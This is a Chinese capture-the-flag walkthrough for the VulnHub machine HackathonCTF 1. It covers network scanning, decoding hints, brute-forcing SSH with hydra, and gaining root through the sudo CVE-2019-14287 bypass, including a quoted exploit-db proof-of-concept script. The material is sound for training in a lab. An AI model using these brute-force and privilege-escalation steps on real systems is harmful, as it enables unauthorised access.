靶机渗透练习85-HackathonCTF 1

news/2024/12/29 14:00:42/

靶机描述

靶机地址:https://www.vulnhub.com/entry/hackathonctf-1,591/

Description

N/A

一、搭建靶机环境

攻击机Kali

IP地址:192.168.9.3

靶机

IP地址:192.168.9.2

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

⬢  HackathonCTF: 1  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.3
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.1     0a:00:27:00:00:11       (Unknown: locally administered)
192.168.9.1     08:00:27:04:a0:60       PCS Systemtechnik GmbH (DUP: 2)
192.168.9.2     08:00:27:d1:8f:8e       PCS Systemtechnik GmbH3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  HackathonCTF: 1  nmap -A -sV -T4 -p- 192.168.9.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-26 09:43 CST
Nmap scan report for bogon (192.168.9.2)
Host is up (0.00061s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
23/tcp   open  telnet  Linux telnetd
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 3 disallowed entries 
|_/ctf /ftc /sudo
|_http-title: 404 Not Found
|_http-server-header: Apache/2.4.7 (Ubuntu)
7223/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 48:98:fc:58:02:9a:73:0b:c8:9a:18:53:00:f3:69:c7 (DSA)
|   2048 71:8f:f7:f7:23:7f:e6:73:f4:2b:a9:51:de:8f:d1:8d (RSA)
|   256 93:62:fe:09:7c:50:8a:1d:19:2f:4d:95:0f:fa:2c:34 (ECDSA)
|_  256 48:6e:82:29:06:a9:77:5f:08:f2:34:df:60:06:a2:cc (ED25519)
MAC Address: 08:00:27:D1:8F:8E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms bogon (192.168.9.2)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.80 seconds

开放了21,23,80,7223端口

发现80端口有robots.txt

2.2枚举漏洞

2.2.1 80 端口分析

访问:http://192.168.9.2/

image-20220426094902558

访问:http://192.168.9.2/robots.txt

image-20220426094916266

得到三个目录,以及base64加密后的字符串

user-agent: *
Disallow: /ctf
user-agent: *
Disallow: /ftc
user-agent: *
Disallow: /sudo
c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==

字符串解密得到一文件名

⬢  HackathonCTF: 1  echo c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg== | base64 -d
ssh-bruteforce-sudoit

依次访问三个目录:http://192.168.9.2/ctf,http://192.168.9.2/ftc,http://192.168.9.2/sudo

均报错 404 Not Found,是不是漏了什么

扫描一下目录看看:dirsearch -u http://192.168.9.2

⬢  HackathonCTF: 1  dirsearch -u http://192.168.9.2 _|. _ _  _  _  _ _|_    v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/192.168.9.2/_22-04-26_09-55-37.txtError Log: /root/.dirsearch/logs/errors-22-04-26_09-55-37.logTarget: http://192.168.9.2/[09:55:37] Starting: 
[09:55:39] 403 -  289B  - /.ht_wsr.txt
[09:55:39] 403 -  292B  - /.htaccess.bak1
[09:55:39] 403 -  293B  - /.htaccess_extra
[09:55:39] 403 -  294B  - /.htaccess.sample
[09:55:39] 403 -  292B  - /.htaccess.save
[09:55:39] 403 -  292B  - /.htaccess_orig
[09:55:39] 403 -  290B  - /.htaccess_sc
[09:55:39] 403 -  292B  - /.htaccess.orig
[09:55:39] 403 -  290B  - /.htaccessOLD
[09:55:39] 403 -  290B  - /.htaccessBAK
[09:55:39] 403 -  282B  - /.htm
[09:55:39] 403 -  291B  - /.htaccessOLD2
[09:55:39] 403 -  283B  - /.html
[09:55:39] 403 -  289B  - /.httr-oauth
[09:55:39] 403 -  292B  - /.htpasswd_test
[09:55:39] 403 -  288B  - /.htpasswds
[09:56:03] 200 -  227B  - /index.html
[09:56:15] 200 -  139B  - /robots.txt
[09:56:16] 403 -  292B  - /server-status/
[09:56:16] 403 -  291B  - /server-statusTask Completed

看到结果,瞬间想到了什么

依次访问:http://192.168.9.2/ctf.html,http://192.168.9.2/ftc.html,http://192.168.9.2/sudo.html

发现都有页面了,查看一下源码

view-source:http://192.168.9.2/ftc.html

<html><body>
<h1>what are you looking for??????</h1></body>
<!-- #117
#115
#101
#32
#114
#111
#99
#107
#121
#111
#117
#46
#116
#120
#116
-->
</html>

这个界面,似乎是ASCII编码,利用脚本转换一下

s = "#117#115#101#32#114#111#99#107#121#111#117#46#116#120#116"
s1 = s.split('#')//用split方法将字符串以#分隔开并将各个元素组成一个数组
s1.pop(0)//删除掉第一个元素,因为第一个元素是空的
for i in s1:print(chr(int(i)),end="")//end="" 为了不换行

运行后得到use rockyou.txt#

这个名字好像是kali自带的那个字典,貌似提示爆破要用这个字典

view-source:http://192.168.9.2/sudo.html

<html>
<body style="background-color:#000000"><h1 style="color: #f5f5f5 ; font-size: 100px ; text-align: center;">Just Sudo It..</h1>
<h1 style="color: #616161; text-align: center;">From the little spark may burst a mighty flame.</h1></body>#uname : test</html>

这个提示好像是用户名为test

没有其他信息了

2.3漏洞利用

2.3.1 ssh爆破

根据字典跟用户名,爆破一下ssh

hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.9.2:7223 -f

⬢  HackathonCTF: 1  hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.9.2:7223 -f
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-26 11:58:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.9.2:7223/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
[7223][ssh] host: 192.168.9.2   login: test   password: jordan23
[STATUS] attack finished for 192.168.9.2 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-26 12:01:31

成功拿到用户密码为test | jordan23

尝试登录

⬢  HackathonCTF: 1  ssh test@192.168.9.2 -p 7223
The authenticity of host '[192.168.9.2]:7223 ([192.168.9.2]:7223)' can't be established.
ED25519 key fingerprint is SHA256:5rYzvIM74WtDvpXcOoCL+yip49t4lsCLAPqvXFn61PM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.9.2]:7223' (ED25519) to the list of known hosts.
test@192.168.9.2's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)* Documentation:  https://help.ubuntu.com/
Last login: Mon Oct 26 23:54:45 2020
test@ctf:~$ 

成功登录

2.4权限提升

2.4.1 信息收集

查看一下.bash_history

root@ctf:/home# cd test
root@ctf:~# ls -al
total 28
drwxr-xr-x 3 test test 4096 Sep 24  2020 .
drwxr-xr-x 4 root root 4096 Sep 23  2020 ..
-rw------- 1 test test 1145 Oct 27  2020 .bash_history
-rw-r--r-- 1 test test  220 Sep 23  2020 .bash_logout
-rw-r--r-- 1 test test 3637 Sep 23  2020 .bashrc
drwx------ 2 test test 4096 Sep 23  2020 .cache
-rw-r--r-- 1 test test  675 Sep 23  2020 .profile
root@ctf:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ctf:~# ls
root@ctf:~# cd /home
root@ctf:/home# ls
ctf  test
root@ctf:/home# cd test
root@ctf:~# ls
root@ctf:~# ls -al
total 28
drwxr-xr-x 3 test test 4096 Sep 24  2020 .
drwxr-xr-x 4 root root 4096 Sep 23  2020 ..
-rw------- 1 test test 1145 Oct 27  2020 .bash_history
-rw-r--r-- 1 test test  220 Sep 23  2020 .bash_logout
-rw-r--r-- 1 test test 3637 Sep 23  2020 .bashrc
drwx------ 2 test test 4096 Sep 23  2020 .cache
-rw-r--r-- 1 test test  675 Sep 23  2020 .profile
root@ctf:~# cat .bash_history
exit
sudo -i
apt-get update
sudo apt-get update
exit
logout
exit
ls
cd /home
ls
cd Desktop
ls
cd ..
pwd
cd home
ls
cd ctf
ls
cd ~
cd /etc
ls
sudo nano rc.local
cd ..
ls
cd bin
ls
cd ..
ls
cd dev
ls
cd ..
ls
cd root
cd lib
ls
cd ..
cd home
ls
cd test
mkdir ctf.conf
ls
rm ctf.conf/
rm -f ctf.conf/
rm -r ctf.conf/
ls
cd home'
cd home
ls
cd ..
ls
mkdir ctf.conf
mkdir ctf_conf
mkdir somu
logout
cd ..
ls
cd test/
ls
cd ctf.conf/
logout
cd ..
cd test/
ls
cd ctf.conf/
ls
logout
ls
cd ..
ls
cd test/
ls
cd /root
ls
cd ..
ls
cd media/
ls
cd floppy
ls
cd media/
ls
cd imp/
ls
nano pass.txt 
logout
ls
cd /home/
ls
cd ..
ls
cd media/
ls
cd floppy
ls
cd media/
ls
cd imp/
ls
cat pass.txt 
nano pass.txt 
clAR
CLEAR
clear
cd./
cd :/
cd /
ls
sudo poweroff -f
poweroff
sudo -i
cd /
ls
cd var
ls
cd /media
ls
cd floppy
ls
cd media/
ls
cd imp/
ls
cd ..
cd /run
ls
cd /
ls
locate ctf.zip
cd bin/
ls
cd /
ls
cd dev/
ls
cd /
ls
cd lib
ls
cd /
ls
cd etc
ls
cd /
ls
sudo -i
logout
cd /
ls
cd var/
la
logout
jordan23
sudo -i
su ctf
uid
uname -r
sudo -v
logout
sudo -u #-1
sudo --u #-1
logout
exit
sudo -i
reboot
sudo -i
sudo -u#-1 /etc
sudo -u#-1 /bin/bash
logout
root@ctf:~# 

发现最后运行了sudo -u#-1 /bin/bash,这个命令应该是提权用的

sudo -l 查看一下是否有可以利用的

test@ctf:~$ sudo -l
[sudo] password for test: 
Matching Defaults entries for test on ctf:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser test may run the following commands on ctf:(ALL, !root) ALL
test@ctf:~$ 

可看到给与的权限为ALL最高权限!好像正就是运行那个命令,尝试一下

test@ctf:~$ sudo -u#-1 /bin/bash
root@ctf:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ctf:~# 

成功提权,无flag

后来去搜了一下这个命令

是一个CVE:https://www.exploit-db.com/exploits/47502

# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287'''Check for the user sudo permissionssudo -l User hacker may run the following commands on kali:(ALL, !root) /bin/bashSo user hacker can't run /bin/bash as root (!root)User hacker sudo privilege in /etc/sudoers# User privilege specification
root    ALL=(ALL:ALL) ALLhacker ALL=(ALL,!root) /bin/bashWith ALL specified, user hacker can run the binary /bin/bash as any userEXPLOIT: sudo -u#-1 /bin/bashExample : hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's idand /bin/bash is executed with root permission
Proof of Concept Code :How to use :
python3 sudo_exploit.py'''#!/usr/bin/python3import os#Get current usernameusername = input("Enter current username :")#check which binary the user can run with sudoos.system("sudo -l > priv")os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")binary_file = open("binary")binary= binary_file.read()#execute sudo exploitprint("Lets hope it works")os.system("sudo -u#-1 "+ binary)

总结

本靶机比较简单,最后的提权值得学习一下

  1. 信息收集
  2. ASCII转换
  3. base64解密
  4. hydra爆破ssh密码
  5. sudo提权—CVE 2019-14287

http://www.ppmy.cn/news/214742.html

相关文章

vulnhub Hackathon2渗透笔记

靶机下载地址&#xff1a;https://www.vulnhub.com/entry/hackathonctf-2,714/ kali ip地址&#xff1a;192.168.20.130 信息收集 扫描靶机ip地址 nmap -sP 192.168.20.0/24确定靶机ip 进行端口扫描 nmap -A -p 1-65535 192.168.20.134首先我们使用匿名用户登录ftp看看有…

京东产发奔赴港股上市,分拆上市或成互联网大厂的共同选择?

‍数据智能产业创新服务媒体 ——聚焦数智 改变商业 3月30日晚间&#xff0c;京东集团&#xff08;9618.HK&#xff09;相继发布2则公告称&#xff0c;拟分拆京东智能产发股份有限公司&#xff08;以下简称“京东产发”&#xff09;、京东工业股份有限公司&#xff08;以下简称…

pip runpy.py 报错 pip升级后问题及解决

今天安装了python之后&#xff0c;突然发现pip出问题了&#xff0c;问题指向runpy.py&#xff0c;解决方案在末尾&#xff0c;仔细往下看&#xff01; Traceback (most recent call last):File "c:\program files\python37\lib\runpy.py", line 193, in _run_module…

Android ijkplayer(Gsyvideoplayer)播放视频有声音却黑屏

这个视频格式是flv&#xff0c;推流走的是rmtp&#xff0c;是这个问题的解决我开始是直接百度了下&#xff0c;很多资料显示需要下载安装ubuntu后重新编译&#xff0c;感觉有点麻烦&#xff0c;找github上的issue&#xff0c;发现设置 android:hardwareAccelerated"true&…

GTA5进游戏黑屏但是有声音

进游戏黑屏&#xff0c;有声音&#xff0c;最小化再打开2秒后又卡死 解决方案&#xff1a;改游戏全屏为窗口模式或无边窗口模式

PlayerBase播放黑屏有声音

记录一下用这个框架的问题。。。 android:hardwareAccelerated"true" 这样即可。

华为服务器报警显示F02,华为手机黑屏白字怎么调回来

大家好&#xff0c;我是时间财富网智能客服时间君&#xff0c;上述问题将由我为大家进行解答。 以荣耀20Pro手机为例&#xff0c;显示黑屏白字就是开启了【深色模式】功能&#xff0c;黑屏白字调回来的方法如下&#xff1a; 1、点击打开手机桌面上的【设置】。 2、点击打开【显…

Android 判断手机是不是黑屏

Android没有提供专门的API来检测当前手机是否锁屏了。但是&#xff0c;在监听机制中&#xff0c;Android有3个广播与锁屏相关。 代码如下&#xff1a; public class MainActivity extends AppCompatActivity {public static final String TAG "SCREEN";Overridepr…